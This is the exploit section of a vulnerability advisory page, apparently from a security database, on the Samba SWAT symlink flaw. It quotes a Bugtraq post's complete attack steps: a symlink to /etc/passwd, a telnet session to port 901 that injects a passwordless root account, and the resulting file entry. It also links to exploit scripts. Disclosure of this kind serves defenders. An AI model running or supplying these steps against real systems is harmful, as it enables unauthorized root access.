• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

SAMBA SWAT Symlink Vulnerability

From the BUGTRAQ post on this issue (included in full in the 'Credit' section):


ln -s /tmp/cgi.log /etc/passwd

telnet localhost 901
--enter the following--
rootuser::0:0::/:/bin/bash
--hang up the connection--

We now have the following entry in our /etc/passwd file:
[Date: Mon, 23 Oct 2000 16:03:13 GMT localhost.localdomain (127.0.0.1)]
rootuser::0:0::/:/bin/bash

• /data/vulnerabilities/exploits/swat-exp.sh
• /data/vulnerabilities/exploits/swat-exp.c